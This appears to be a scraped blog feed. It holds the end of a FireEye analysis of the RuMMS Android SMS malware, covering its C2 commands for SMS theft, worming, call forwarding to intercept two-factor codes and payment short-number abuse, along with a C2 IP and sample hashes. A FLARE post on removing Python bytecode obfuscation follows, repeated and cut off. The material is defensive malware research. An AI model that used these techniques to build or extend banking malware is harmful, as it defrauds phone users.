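In a real emulation session, a body like this would be POSTed to a URL of the form “http://$C2.$SERVER.$IP/api/?id=$NUM”, as described above.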

Method onPostExecute parses the response from the above HTTP session and executes the commands provided by the remote attacker. As seen from the code in Figure 5, the commands RuMMS supports right now include:

  • install_true: to modify the app preference to indicate that the C2 server received the victim device’s status.
  • sms_send: to send C2-specified SMS messages to C2-specified recipients.
  • sms_grab: to periodically upload the SMS messages in the inbox to the C2 server.
  • delivery: to deliver specified text to all of the victim’s contacts (SMS worming).
  • call_number: to forward phone calls to intercept voice-based two-factor authentication.
  • new_url: to change the URL of the C2 server in the app preference.
  • ussd: to call a C2-specified phone number.

Figure 5. Method onPostExecute: to handle instructions from remote C2

Figure 6 shows an example response sent back from one C2 server. Note that inside this single response, there is one “install_true” command, one “sms_grab” command and four “sms_send” commands. With the four “sms_send” commands, the messages as specified in the key “text” will be sent immediately to the specified short numbers. Our analysis suggests that the four short numbers are associated with Russian financial institutions, presumably where a victim would be likely to have accounts.

Figure 6. Example Response in JSON format
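The dispatch logic in onPostExecute can be modeled in a few lines. This is a hedged reconstruction for illustration only: the JSON field names used here (“command”, “number”, “text”, “url”) are assumptions, not verbatim from the malware.

```python
import json

def handle_response(raw):
    """Toy model of the C2 command dispatch; field names are assumptions."""
    actions = []
    for item in json.loads(raw):
        cmd = item.get('command')
        if cmd == 'install_true':
            actions.append(('mark_registered',))
        elif cmd == 'sms_grab':
            actions.append(('upload_inbox',))
        elif cmd == 'sms_send':
            actions.append(('send_sms', item['number'], item['text']))
        elif cmd == 'new_url':
            actions.append(('set_c2_url', item['url']))
    return actions

# A response shaped like Figure 6: one install_true, one sms_grab,
# and an sms_send targeting a short number
resp = ('[{"command": "install_true"},'
        ' {"command": "sms_grab"},'
        ' {"command": "sms_send", "number": "+7494", "text": "balance"}]')
print(handle_response(resp))
```

Note that a single response can carry several commands at once, which matches the behavior observed in Figure 6.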

In particular, short number “+7494” is associated with a payment service provider in Russia. The provider’s website described how the code 7494 can be used to provide a series of payment-related capabilities. For example, sending text “Balance” will trigger a response with the victim’s wallet balance. Sending text “confirm 1” will include proof of payment. Sending text “call on” will activate the USSD payment confirmation service.

During our investigation, we observed the C2 server sending multiple “balance” commands to different institutions, presumably to query the victim’s financial account balances. RuMMS can upload responses to the balance inquiries (received via SMS message) to the remote C2 server, which can send back additional commands to be sent from the victim to the provider’s payment service. These could include resetting the user’s PIN, enabling or disabling various alerts and confirmations, and confirming the user’s identity.

RuMMS Samples, C2, Hosting Sites, Infections and Timeline

In total we captured 297 RuMMS samples, all of which attempt to contact an initial C2 server that we extracted from the app package. Figure 7 lists the IP addresses of these C2 servers, the number of RuMMS apps that connect to each of them, and the example URL used as the first parameter of the HttpPost operation (used in the code of Figure 3). This indicates that multiple C2 servers were used in this campaign, but one (37.1.207.31) was the most heavily used.

Figure 7. RuMMS samples and C2 servers

Figure 8 shows how these samples, C2 servers and hosting websites are related to each other, including when they were compiled or observed. In this figure, the smaller blue-gray boxes represent individual apps in the RuMMS family, while the bigger deep-blue boxes represent C2 servers used by some RuMMS apps. The dotted arrows represent the use of a particular C2 server by a specific app to send information and fetch instructions. The figure covers 11 RuMMS samples, all of which were hosted on the websites shown on the y-axis; the x-axis shows the dates when we first saw these apps in the wild. This figure demonstrates the following interesting information:

  • Threat actors distributed RuMMS via these shared-hosting websites from January 2016 to March 2016.
  • Threat actors used different websites to host different payloads at different times. This kind of “moving target” behavior made it harder to track their actions.
  • The same websites have hosted different RuMMS samples on different dates.
  • C2 servers are shared by multiple samples. This matches our observations of C2 servers as shown in Figure 7.

Figure 8. RuMMS samples, hosting sites, C2 servers from Jan. 2016 to Mar. 2016

We do not know exactly how many people have been infected with RuMMS malware; however, our data suggests that there are at least 2,729 infections with RuMMS samples from January 2016 to early April 2016.

Figure 9 shows the number of RuMMS infections recorded in the last four months. When we first observed the malware in January, we recorded 380 infections. In February, we recorded 767 infections. In March, it peaked at 1,169 infections. In April, at the time of writing this post, we recorded 413 RuMMS infections. Although the propagation trend seems to be slowing down a bit, the figure tells us that RuMMS malware is still alive in the wild. We continue to monitor its progress.

 

Figure 9. RuMMS infections from Jan. 2016 to Apr. 15, 2016

Conclusion

Smishing (SMS phishing) offers a unique vector to infect mobile users. The recent RuMMS campaign shows that Smishing is still a popular means for threat actors to distribute their malware. In addition, the use of shared-hosting providers adds flexibility to the threat actor’s campaign and makes it harder for defending parties to track these moving targets.

Fortunately, FireEye Mobile Threat Prevention platform can recognize the malicious SMS and networking behaviors used by these RuMMS samples, and help us quickly identify the threat. To protect yourself from these threats, FireEye suggests that users:

  • Exercise caution before clicking any link when you are not sure of its origin.
  • Do not install apps from outside the official app store.

To detect and defend against such attacks, we advise our customers to deploy our mobile security solution, FireEye MTP/MSM. This helps our clients gain visibility into threats in their user base, and also enables them to proactively hunt down devices that have been compromised. In addition, we advise our customers with NX appliances to ensure that Wi-Fi traffic is scanned by NX appliances to extend coverage to mobile devices.

Appendix: RuMMS Sample Hashes

016410e442f651d43a7e28f72be2e2ef

 01d95061091d4f6f536bada821461c07

 0328121ca8e0e677bba5f18ba193371c

 03a442b0f7c26ef13a928c7f1e65aa23

 03c85cb479fd9031504bba04c2cefc96

 053c247a1c176af8c9e42fe93fb47c9d

 064799b5c74a5bae5416d03cf5ff4202

 066e171fc083c5e21ac58026870a4ae8

 0749e775f963fdab30583914f01486e3

 081b04697f96568356d7b21ac946fb7c

 0927b599d9599dcd13b6ef5f899ef4d9

 0964ee11f6d19c2297bce3cb484a2459

 0a22ceac6a0ee242ace454a39bff5e18

 0a3b9c27b539498b46e93dbdcfb3de1e

 0abf7a57855c2312661fdc2b6245eef8

 0c3dbcffb91d154b2b320b2fce972f39

 0c75764d172364c239fc22c9c3e21275

 0dd1d8d348a3de7ed419da54ae878d37

 0dd40d2f4c90aec333445112fb333c88

 0e89415cdd06656d03ef498fd1dd5e9b

 0e8ef8108418ca0547b195335ee1dd2c

 0ea83ffc776389a19047947aba5b4324

 0f280e86268da04dc2aa65b03f440c1a

 0f5a6b34e952c5c44aa6f4a5538a6f2b

 0fa1ffbcfe0afc6a4a57fed513a72eb6

 104859f80028792fbd3a0a0ea1e6fd78

 10c58dd41d95a81b1043059563860c1c

 11d425602d3c8311d1e18df35db1daa3

 120561bfced94cc1ce5cda03b203dbf8

 128576fbdb7d2980c5a52cd3286bcca8

 14a8246474ed819a4dfcc3cb06e98954

 14c7f0dc55b5dd0c7e39f455baae3089

 1693f424742279a8678322a012222a02

 16b778921b6db27a2af23dd8ce1fac3e

 16ec62c1d7d4ac3f3d7d743fc1e21bf6

 1711081b5ba5c3941ae01d80819c7530

 177af9700bcc8b7c8c131b662e8cdda8

 17bfe26e9a767c83df2aab368085e3c2

 17d083988dd5e6d9c2517899ae30bb02

 1850c020edafcf8254279e352ce33da9

 18d1b845b2ee1960b304ab2fd3bfe11b

 1b4b6bf1e40d5954b34a815d1438efd9

 1cbedd5cc8e9b59f90ec81a5aec0239f

 1cead79dfdaee9d7eb914a5b13a323ea

 1dc8e18e610fd921ffa638b3f51de4b2

 1ed3c0158eb960bb47847596a69a744c

 2177a3094dd06f9d777db64364d3fc2c

 220fc807884acfcd703596994e202f21

 244b965d3816ac828d21c04bcf0519a4

 24f23fe808ba3f90a7a48eae37ce259d

 2745bc6f165ae43f1edf5cd1e01db2c5

 2802552e2aa5491ebbf28bfef85618cb

 29a8eef1b304d53f303d03ba6994ed32

 2a1c02bd4263a4e1cb6f648a9da59429

 2a6c086c589d1b0a7d6d81c4e4c70282

 2ac5e8e2fd8050330863875d5018cb59

 2c200cfcc5f4121fb70b1c152357225b

 2cb75f46b901c17b2f0a9cb486933d65

 2cd1908f4846e81e92f82684d337e858

 2ce248b19c30a9fed4cd813c23831d7a

 2cf5b053bf51e9ff8ea653da5523b5f1

 2e44ffbaa24c1203df218be1cc28a9e5

 2e9fcd26fdeeed19f0de865298d59f2e

 308bec5d52d55c00aff0b561e7975bdf

 30a8c03a7d6a489da047443938e2aa20

 30c1a1a7417598fa8f23572f0f090866

 30f2b0edd191d1465bac11553d60f761

 3103bd49786d52c920e12303921bd2f1

 3131d58ace4f3485dcc2581be3fcfb42

 315a713c65baf5390fcf4232df3d1669

 318513f9f14fbf78ec037b62b221c91b

 3199b7e9b27c1aa619bc6959c6eab458

 31eddefcadb1d4a6bbc55e610d085638

 34788c0c80687e1488d3c9b688de9991

 34e8dfc3d5fe5a936d556ac79e53412f

 356393e8c85864fa2e31e30d28c13067

 35666c9ef8d3d81d8641578259982e57

 37506bcd79e0a39d56edda2f0713ce34

 38b9c800c9787ea6de3f5a9436444435

 391a74f46c7f7c34e98be38228fc94b6

 3a0baa509a54359d10696d995dfe783e

 3abe743871688eb542a36bdd4f5ba196

 3b2dda7dafbc3f690f179999b367f743

 3b39743b98e7223c93f15026c009e2ed

 3d3dac2656f5850d6e2cababc06edd23

 3d4e135e647fba30e67415e5ebc5af42

 3de3c1ff2db0f75d18c10c1d682596a6

 3f9376bd042b5c9b111dde1b460ab9b5

 40f7cec380c6904bbeaac5c42bc99fb6

 412e4f59e3a7a7d870581e83bffa33d1

 41b946bf78606d4f94a7206f024914bf

 422fc3634a8a575945fc96bd85465275

 4294589c588b577529150b01ce588a13

 437db1d8d84e245875064ba7cccc9ae0

 44a56e288d906cbfec85f6715554f83b

 472187a7eba0fd0479130711df34a409

 4827e46a2382fdfa2847db0d376c2c52

 48378433f79ac304d0bb86ee6f99958e

 4841a521f95ea744243566cc69904bd1

 4aa78398d9a927d2c67bf6a5fb0c8db8

 4b478ad35ad285ff4ff2623cb8c63ff7

 4be9cb7e3cdab4766411a0d2506a2cf7

 4d7ce984313b06835b72a4e6ad6e61fa

 4e60269982182b1cb8139dd5159a6b78

 4ed59658844835a222e09c6ca5701bf8

 4eda51773b46975d47b8932fee4cd168

 4f837a3eee0a228c1c7cb13916f14fe8

 4fad9557973f3451be04efbbf9f51b8d

 4faefac63b3876604945f11effc6042a

 5044a06f037118627899abd1229895fe

 50aa9c662a508c9a9bda508bbb5b4ac7

 50cccf3ee065977de3a2c07249313411

 512c580db356e18c51b051a7b04fa0c1

 5144790d272daacc7210fc9e2ae41f12

 516d74358ef2f61fbb90e9d1a17f59f9

 52c5cc858d528fd0554ef800d16e0f8f

 53281564e50a8dfab1d7d068f5f3bae3

 53baf60ae4611b844e54a600f05c9bbf

 5510c69693819baf9ad2e4a346f805b0

 5527ffe6768f3b61d69ee83039f6e487

 5678e4c2cfe9c2bd25cde662b026550e

 56d95aa243571ccd85b516d0f393ed37

 56dedd0ca8849891486e23a53acb66ed

 5702f860032be6a67d5ead51191f90a8

 57343fd964265e6472e87a4f6c626763

 5814b9a4b3f10abe74b61901ee151a9f

 5a95d673b2c2d758c7d456c421ba1719

 5b6c7341a08f5cd4c27f443e3c057dd1

 5b7b1c1d3102a04e88ddfe8f27ffa2f2

 5bc0678baa1f30b89b80dcc7cf4431dc

 5c318b3ba77d0052427c7bffeb02a09f

 5de94bc0c4cc183c0ee5a48a7ae5ae43

 5e47b31cf973beba682c2973ed3dc787

 5e5f6b1fe260475872192d2ec3cb1462

 5e9773741a5e18672664121f8e5f4191

 5f08343486e42a0f8db0c0647c8255d1

 609e0b1940d034b6d222138e312c8dd2

 60b89dc654ed71053466b6c1f9bec260

 6148b71d713c80af2acfd3506d72a7a4

 6179d744808ad893dabb7b7de6b4a488

 619dade7c5a7444397b25c8e9a477e96

 61e67e7f1e2644bb559902ba90e438a5

 62186f41850c54a46252a7291060760d

 64c2cbc4bfd487e30f7b925fbbc751b0

 65eab2ed600f5ae45fe916a573ce72b0

 66e9dca8bb42dd41684c961951557109

 67fe7190cefc9dad506ed3c1734ff708

 692989b9681f80e9051359d15ec2297f

 6ae2e0ed9ae6dca4ea1ba71ae287406c

 6de02d603b741c7a5fc949952088f567

 6e2b5af3acf5306d8ac264a47193fe49

 6ee8919bd388494e5694b39ae24bd484

 6ef671cfdf28c7252db1c451ca37ec9a

 70122f367b82c8dd489b0fafa32d0362

 7064de8a83750bd1b38c23324b3757e3

 7089021c4ac0a7f38d52206653070af9

 7211a069239cb354c6029f963c2a5f06

 73d14b09f12eca5af555e5d205808064

 7511ed572f555af27c47f2a02b64302d

 75aab55e822bbca87f60970d37c8d7b3

 75d87e15a789770c242fec0867359588

 75e18289c8e9cc484e7e43ca656be24a

 76546e44fe4761503cb807a8d96a6719

 766084da85eab06dc639a62ff381b541

 778cc7e83ad27c92f30cea519989f47b

 788f75bf8f1330ec78d5d454bf88d17f

 79736c03eeda35ab7c3b6656048c0247

 7b853f8219384485b8753a58259ad171

 7c3e5bace659e9ddf7444b744a8667e9

 7d1c2d11a9b68a107ffb32c86675d8e9

 7d91f480e5a0c4372a43103f678eb328

 7e0671fc66f9a482000414212bf725e3

 7f79a0ccc91f654de59c361af1964354

 80a80e9f0b241ab3d0d9febab34d0e56

 822c9b26e833e83790433895fe7e2d3b

 836e64f3e9046e08cdf66b944718e48b

 83e4610c9500a48b8d1721c11e5797e2

 84354edd9292441aeed05c548fdaed7c

 84d600d85a061fa137e4b8fc82e1de2f

 851953bee7687d96891f45f24297a50b

 8599910e19552c9aa26db7be3e04be55

 859e9dbcbd0db577ff401537ae560e74

 85d866a99d6b130cbdde3949c015fec4

 86484d0e432e8c7e8f1b213413157138

 8895d772158f5456a80a2093aad516a2

 895a3b66c76c169b02843468062b1c5d

 895ef967c9ee97c5b9f3bdc426f6ad0f

 898683c4f39ad83f53f38460e170fd77

 8a0aae077c62d37ba9aeed2ad441dcf3

 8a5c4d1d946a01b56f180c930438c1e9

 8b56c493375d3b65d509793751509ba5

 8ceb4223e6238955fa7e154a794d5d04

 8d7c7392767415031d9ded205f0b29ef

 8dadd1162d01911160a5dbcdf081c5ba

 8e1207efd35f03caf74fdff314368da9

 8e5e0eb98e813371653b09864d4fc76a

 8f0243b5077bdb23baa1ceeedc697ff0

 8f11770349001409163245422b8d4442

 8f1fa31155a38ce3d6bc0fba43a82362

 90366f0731b60cf0c9959f06509d9ff5

 91a2746500d253633dd953692183fd76

 91c6a4e86d72c60beef95b75f9b4be82

 93323852f58c4e1b436a671651cc4998

 93b8d4d9704c13d983cf99a1296259d2

 940981070911dee2e2818216047d2ecb

 9461365a2bed17fb5b41536bf07ba165

 95921f248cd912e301c6b04120714d1f

 960d7dfa6f9c110732c34025687d5b60

 9621369183946ebb60d9959828dd5e16

 97cbd88d4414b41939571e994add3756

 99236003238f8ee88b5c4c8d02fdd17d

 9ab4cbd602ad8e5434e863bf0d84be2f

 9ba65c06057c179efbc8a62f86f2db71

 9bdb39a159774154fabc23d06ad8d131

 9c3ba2e8d172253e9d8ce30735bfbf78

 9cf27a07e0a4a6f6b1a8958241a6a83f

 9e173831c7f300e9dca9ee8725a34c5a

 9e7d24027621c0ecfd13995f2e098e8c

 9f723da52e774a6c5d03d8ba5f6af51f

 a0c486b879e20d5ac1774736b48e832b

 a152ea9ee04ca9790d195f9f3209b24a

 a1803ced57c1917f642ed407fc006659

 a1c504f51654200e6d0e424f38700f14

 a1d5f30ea6fc30d611c2636da4e763d4

 a1e7602b96d78fc37b5e1d271dbab273

 a2c5ffc33a96c6b10ae9afdaf5d00e62

 a31adc93ea76a4e2dfb6ae199fc0a294

 a3aaff686bf34d60b8319ef2525387d3

 a3ecea301bbe612ef9e17a502ee94b21

 a44b5c01378dd89c1c17565736f6c47b

 a4c8b0199f92f9be7b482df2bcce8162

 a4cba22ecfa33d1a4ad69be4616eeaf7

 a4f19520957bee3d68755a3978fb16be

 a61d0ea6e5711135383a3592e6b31e49

 a639338fd99cfd50292425d36618074c

 a6c5d89df0774fdd1643080548bfe718

 a893d3cfce6e8869b35a8140089ec854

 a8f2d507661b76a94971dcf7d593fc8a

 a9776f2633565419e55f6842a0b74278

 a9ce99d1788c13edaa3fb7f92ebb1240

 aa48cd40fcfe561bb5cd274549c94d6f

 aa5216ce42e1c279042662c018509140

 aa735ae056b57471bbe3499517afd057

 ac6a922fd8c604eb56da5413c2368be7

 ac8ad3eb56d2a94db30d3f4acfe4b548

 acfc48ed626369cf0fb6e1872c92e1bd

 ad75d090f865cbab68c411682ad2eb89

 ad99f483836492e34c072764db219fe4

 addd10c396fb3c1998ea451710f6f6f6

 aea04d46b9a4097155afcb3a80aafb8f

 af60a1f801ee3d5ba256c9354d8e9ca3

 af732879ff0b20eb02386a16581c8a4b

 afbfbb0fc1e7cbf56732d2afaeb21302

 b0737a9732647803bab45e64b4dc8f42

 b11bb0abd2a72e0ca88fe9817d42e139

 b2e0eae1d879287da6155ffa1ffff440

 b371fd7024687fa205135e2f3425822d

 b4298ce2eab75b9729ae3ac54e44e4d1

 b536f2134d75a4ac257071615e227a7d

 b56b456488358fcdc0ce95df7e0309cf

 b57618a7098fa9fcc14b8779b71ba62a

 b5afb1b35f7ee56218ee1c0d6ba92fb7

 b5f1fe0ab8ef34d6429916b6257e682b

 b66eb248e1ca0c35bc7e518fa4d5757a

 b6f52abceb49c6d38e29de6951f768fa

 b7343a1094f139699bc4698343d2b7ad

 b80f53f44e737aa1ecc40a1c5cf10a5d

 b9057cc24a9d4bde42198d3956ee46e6

 b9680d7e427bc2a3ed0320fb15023a88

 ba1c5315933c1a4d446bf90eb9d7c8c6

 bbb20fe1b97f12934b70cb1a7d2399d4

 bbfac3011f9e3b239e4eb9f9d6b82763

 bcd595f9eb7fba9fa82c21805ebb1535

 bd8c50221e6ec939f7b4df54795bca20

 bd9ebb6baf95d25fc54568bb4c37567b

 bddd52910f0c40b538418144ae0b63ac

 bde66ebf8cd08b301b0b6c3140df5fed

 be10e76060c3bbc59c1d87bdc3abeb12

 c23c4130ffebf9ffe60136b7099f8603

 c2eb3eed3f2082cf05e7c785cfab5487

 c36230f577cfa4d25e29be00ada59d91

 c39f6e984efcbf40612a3acb780b638a

 c528caa8cffd76825748507b8b0ad03e

 c5dd6c26c4c1e03fd1ec51cb1dec91ca

 c620fef9ebfa83e84c51134d14d44ec8

0c3dbcffb91d154b2b320b2fce972f39

27660806ff465edbe0f285ab67a9a348

36966643d45c09afb42a40fa6f71b38c

458a8c5f99417f5031885116e40117ae

4aebe1ff92fad7c4dba9f8a26b6a61d3

551f94100c04ed328ddeaf4817734eb5

6fb3c026537a0248f4ef40b98a9f1821

acf114610271e97cb58b172d135564bb

ccabfa1d72797c635eb241f82a892e22

cf5451b8b53092266321a421ba9224ca

d5ea3a22bce77e4bc279ca7903c3288a

d8caad151e07025fdbf5f3c26e3ceaff

eb7d7dacebba8741c2d483f0fcabdc82

 

Deobfuscating Python Bytecode

Introduction

During an investigation, the FLARE team came across an interesting Python malware sample (MD5: 61a9f80612d3f7566db5bdf37bbf22cf) that is packaged using py2exe. Py2exe is a popular way to compile and package Python scripts into executables. When we encounter this type of malware we typically just decompile and read the Python source code. However, this malware was different: its bytecode had been manipulated to prevent it from being decompiled easily!

In this blog we’ll analyze the malware and show how we removed the obfuscation, which allowed us to produce a clean decompile. Here we release source code to our bytecode_graph module to help you analyze obfuscated Python bytecode (https://github.com/fireeye/flare-bytecode_graph). This module allows you to remove instructions from a bytecode stream, refactor offsets and generate a new code object that can be further analyzed.

Background

Py2exe is a utility that turns a Python script into an executable, which allows it to run on a system without a Python interpreter installed. Analyzing a Py2exe binary is generally a straightforward process that starts with extracting the Python bytecode followed by decompiling the code object with a module such as meta or uncompyle2. Appendix A contains an example script that demonstrates how to extract a code object from a Py2exe binary.

When attempting to decompile this sample using uncompyle2, the exception shown in Figure 1 is generated. The exception suggests the bytecode stream contains code sequences that the decompiler is not expecting.


Figure 1: Uncompyle2 exception trace

Obfuscation that breaks decompilers

To understand why the decompiler is failing, we first need to take a closer look at the bytecode disassembly. A simple method to disassemble Python bytecode is to use the built-in module dis. When using the dis module, it is important to use the same version of Python as the bytecode to get an accurate disassembly. Figure 2 contains an example interactive session that disassembles the script “import sys”. Each line in the disassembly output contains an optional line number, followed by the bytecode offset and finally the bytecode instruction mnemonic and any arguments.

Figure 2:  Example bytecode disassembly
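A similar session can be reproduced in a few lines; the exact opcodes and offsets in the output vary with the interpreter version.

```python
import dis

# Compile a one-line script and disassemble the resulting code object
code = compile("import sys", "<example>", "exec")
dis.dis(code)

# The same instruction stream can also be walked programmatically
ops = [ins.opname for ins in dis.get_instructions(code)]
print(ops)
```

On any CPython 3.x, the stream includes an IMPORT_NAME for sys followed by a STORE_NAME binding it.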

Using the example script from Appendix A, we can view the disassembly of the code object to get a better idea of what is causing the decompiler to fail. Figure 3 contains a portion of the disassembly produced by running the script on this sample.

Figure 3: Bytecode disassembly

Looking closer at the disassembly, notice there are several unnecessary bytecode sequences that have no effect on the logic of the code. This suggests that a standard compiler did not produce the bytecode. The first surprising bytecode construct is the use of NOPs, for example, found at bytecode offset 0. The NOP instruction is not typically included in compiled Python code because the interpreter does not have to deal with pipelining issues. The second surprising bytecode construct is the series of ROT_TWO and ROT_THREE instructions. The ROT_TWO instruction rotates the top two stack items and the ROT_THREE rotates the top three stack items. By calling two successive ROT_TWO or three ROT_THREE instructions, the stack is returned to the same state as before the instruction sequence. So, these sequences have no effect on the logic of the code, but may confuse decompilers. Lastly, the LOAD_CONST and POP_TOP combinations are unnecessary. The LOAD_CONST instruction pushes a constant onto the stack while the POP_TOP removes it. This again leaves the stack in its original state.

These unnecessary code sequences prevent decompiling bytecode using modules such as meta and uncompyle2. Many of the ROT_TWO and ROT_THREE sequences operate on an empty stack, which generates errors when inspected because both modules use a Python List object to simulate the runtime stack. A pop operation on the empty list generates exceptions that halt the decompilation process. In contrast, when the Python interpreter executes the bytecode, no checks are made on the stack before performing operations on it. Take for example ROT_TWO from ceval.c in Figure 4.

Figure 4: ROT_TWO source

Looking at the macro definitions for TOP, SECOND, SET_TOP and SET_SECOND from ceval.c in Figure 5, the lack of sanity checks allow these code sequences to execute without stopping.

Figure 5: Macro definitions

The NOPs and LOAD_CONST/POP_TOP sequences stop the decompilation process in situations where the next or previous instructions are expected to be a specific value. An example debug trace for uncompyle2 is shown in Figure 6 where the previous instruction is expected to be a jump or a return.

Removing the obfuscation

Now that the types of obfuscation have been identified, the next step is to clean the bytecode in hopes of getting a successful decompile. The opmap dictionary from the dis module is very helpful when manipulating bytecode streams. When using opmap, instructions can be referenced by name rather than by a specific bytecode value. For example, the NOP opcode value is available as dis.opmap['NOP'].
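For example (opcode values differ between interpreter versions, and ROT_TWO/ROT_THREE were removed entirely in CPython 3.11, so they are looked up defensively here):

```python
import dis

# Resolve opcode values by mnemonic instead of hard-coding magic numbers
NOP = dis.opmap['NOP']
LOAD_CONST = dis.opmap['LOAD_CONST']
POP_TOP = dis.opmap['POP_TOP']

# ROT_TWO only exists on older interpreters (removed in CPython 3.11)
ROT_TWO = dis.opmap.get('ROT_TWO')

print(NOP, LOAD_CONST, POP_TOP, ROT_TWO)
```

The reverse mapping, dis.opname, turns a numeric opcode back into its mnemonic, which is handy when printing a cleaned stream.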

Appendix B contains an example script that replaces the ROT_TWO, ROT_THREE and LOAD_CONST/POP_TOP sequences with NOP instructions and creates a new code object. The disassembly produced from running the script in Appendix A on the malware is shown in Figure 6.

Figure 6: Clean disassembly

At this point, the disassembly is somewhat easier to read with the unnecessary instruction sequences replaced with NOPs, but the bytecode still fails to decompile. The failure is due to how uncompyle2 and meta deal with exceptions. The problem is demonstrated in Figure 7 with a simple script that includes an exception handler.

Figure 7: Exception handler

In Figure 7, the exception handler is created using the SETUP_EXCEPT instruction at offset 0, with the handler code beginning at offset 13 with the three POP_TOP instructions. Both the meta and uncompyle2 modules inspect the instruction prior to the exception handler to verify it is a jump instruction. If the instruction isn’t a jump, the decompile process is halted. In the case of this malware, the instruction is a NOP because the obfuscation instructions were replaced with NOPs.

At this point, to get a successful decompile, we have two options. First, we can reorder instructions to make sure they are where the decompiler expects them. Alternatively, we can remove all the NOP instructions. Both strategies can be complicated and tedious because absolute and relative addresses for any jump instructions also need to be updated. This is where the bytecode_graph module comes in. Using the bytecode_graph module, it’s easy to replace and remove instructions from a bytecode stream and generate a new stream with offsets automatically updated accordingly. Figure 8 shows an example function that uses the bytecode_graph module to remove all NOP instructions from a code object.

Figure 8: Example bytecode_graph removing NOP instructions
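The core idea, deleting instructions and remapping jump targets, can be shown with a toy model. This is not the real bytecode_graph API: instructions are simplified here to (opname, target-index) tuples, and a jump that lands on a removed NOP is redirected to the next surviving instruction.

```python
# Toy model of NOP removal with offset refactoring (not the real
# bytecode_graph API): each instruction is an (opname, arg) tuple,
# where a JUMP_* arg is the index of its target instruction.
def remove_nops(instructions):
    mapping, kept = {}, []
    for old_idx, (op, arg) in enumerate(instructions):
        # Every old index maps to the next surviving instruction's new index,
        # so a jump that targeted a NOP falls through to the next real opcode.
        mapping[old_idx] = len(kept)
        if op != 'NOP':
            kept.append((op, arg))
    # Rewrite jump targets through the old-index -> new-index mapping
    return [(op, mapping[arg] if op.startswith('JUMP') else arg)
            for op, arg in kept]

prog = [('LOAD_CONST', 0), ('NOP', None), ('JUMP_ABSOLUTE', 3),
        ('NOP', None), ('RETURN_VALUE', None)]
print(remove_nops(prog))
```

The real module does the equivalent work on actual code objects, where jump arguments are byte offsets rather than instruction indices, and emits a new code object once the graph is rewritten.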

Summary

In this blog I’ve demonstrated how to remove a simple obfuscation from a Python code object using the bytecode_graph module. I think you’ll find it easy to use and a perfect tool for dealing with tricky py2exe samples. You can download bytecode_graph via pip (pip install bytecode-graph) or from the FLARE team’s Github page: https://github.com/fireeye/flare-bytecode_graph.

An example script that removes the obfuscation discussed in this blog can be found here: https://github.com/fireeye/flare-bytecode_graph/blob/master/examples/bytecode_deobf_blog.py.

Hashes identified that implement this bytecode obfuscation:

        61a9f80612d3f7566db5bdf37bbf22cf
        ff720db99531767907c943b62d39c06d
        aad6c679b7046e568d6591ab2bc76360
        ba7d3868cb7350fddb903c7f5f07af85

Appendix A: Python script to extract and disassemble Py2exe resource

Appendix B: Sample script to remove obfuscation


Deobfuscating Python Bytecode

$
0
0
Introduction

During an investigation, the FLARE team came across an interesting Python malware sample (MD5: 61a9f80612d3f7566db5bdf37bbf22cf ) that is packaged using py2exe. Py2exe is a popular way to compile and package Python scripts into executables. When we encounter this type of malware we typically just decompile and read the Python source code. However, this malware was different, it had its bytecode manipulated to prevent it from being decompiled easily!

In this blog we’ll analyze the malware and show how we removed the obfuscation, which allowed us to produce a clean decompile. Here we release source code to our bytecode_graph module to help you analyze obfuscated Python bytecode (https://github.com/fireeye/flare-bytecode_graph). This module allows you to remove instructions from a bytecode stream, refactor offsets and generate a new code object that can be further analyzed.

Background

Py2exe is a utility that turns a Python script into an executable, which allows it to run on a system without a Python interpreter installed. Analyzing a Py2exe binary is generally a straightforward process that starts with extracting the Python bytecode followed by decompiling the code object with a module such as meta or uncompyle2. Appendix A contains an example script that demonstrates how to extract a code object from a Py2exe binary.

When attempting to decompile this sample using uncompyle2, the exception shown in Figure 1 is generated. The exception suggests the bytecode stream contains code sequences that the decompiler is not expecting.


Figure 1: Uncompyle2 exception trace

Obfuscation that breaks decompilers

To understand why the decompiler is failing, we first need to take a closer look at the bytecode disassembly. A simple method to disassemble Python bytecode is to use the built-in module dis. When using the dis module, it is important to use the same version of Python as the bytecode to get an accurate disassembly. Figure 2 contains an example interactive session that disassembles the script “import sys”. Each line in the disassembly output contains an optional line number, followed by the bytecode offset and finally the bytecode instruction mnemonic and any arguments.

Figure 2:  Example bytecode disassembly
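The session in Figure 2 can be reproduced with a couple of lines. Note the original post used Python 2.7, so the exact mnemonics printed will differ slightly on newer interpreters, but the offset/mnemonic/argument layout is the same.

```python
import dis

# Compile a one-line script and disassemble it, as in Figure 2
code = compile("import sys", "<demo>", "exec")
dis.dis(code)  # prints line number, bytecode offset, mnemonic, argument

# The same information is also available programmatically
names = [ins.opname for ins in dis.get_instructions(code)]
```

Working with `dis.get_instructions()` rather than the printed output is convenient when scripting analysis of many code objects.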

Using the example script from Appendix A, we can view the disassembly of the code object to get a better idea what is causing the decompiler to fail. Figure 3 contains a portion of the disassembly produced by running that script on this sample.

Figure 3: Bytecode disassembly

Looking closer at the disassembly, notice there are several unnecessary bytecode sequences that have no effect on the logic of the code. This suggests that a standard compiler did not produce the bytecode. The first surprising bytecode construct is the use of NOPs, for example, found at bytecode offset 0. The NOP instruction is not typically included in compiled Python code because the interpreter does not have to deal with pipelining issues. The second surprising bytecode construct is the series of ROT_TWO and ROT_THREE instructions. The ROT_TWO instruction rotates the top two stack items and the ROT_THREE rotates the top three stack items. By calling two successive ROT_TWO or three ROT_THREE instructions, the stack is returned to the same state as before the instruction sequence. So, these sequences have no effect on the logic of the code, but may confuse decompilers. Lastly, the LOAD_CONST and POP_TOP combinations are unnecessary. The LOAD_CONST instruction pushes a constant onto the stack while the POP_TOP removes it. This again leaves the stack in its original state.
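The claim that paired rotations leave the stack untouched is easy to verify with a Python list standing in for the interpreter's value stack:

```python
def rot_two(stack):
    """CPython's ROT_TWO: swap the two topmost stack items."""
    stack[-1], stack[-2] = stack[-2], stack[-1]

def rot_three(stack):
    """CPython's ROT_THREE: lift the second and third items up one
    position and move the top item down to third place."""
    stack[-1], stack[-2], stack[-3] = stack[-2], stack[-3], stack[-1]

s = ["a", "b", "c"]
rot_two(s); rot_two(s)                     # two ROT_TWOs cancel out
rot_three(s); rot_three(s); rot_three(s)   # three ROT_THREEs cancel out
# s is back to ["a", "b", "c"] in both cases
```

This is exactly why the sequences are safe for the malware author to insert: the logic is unchanged, but a decompiler simulating the stack may not survive them.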

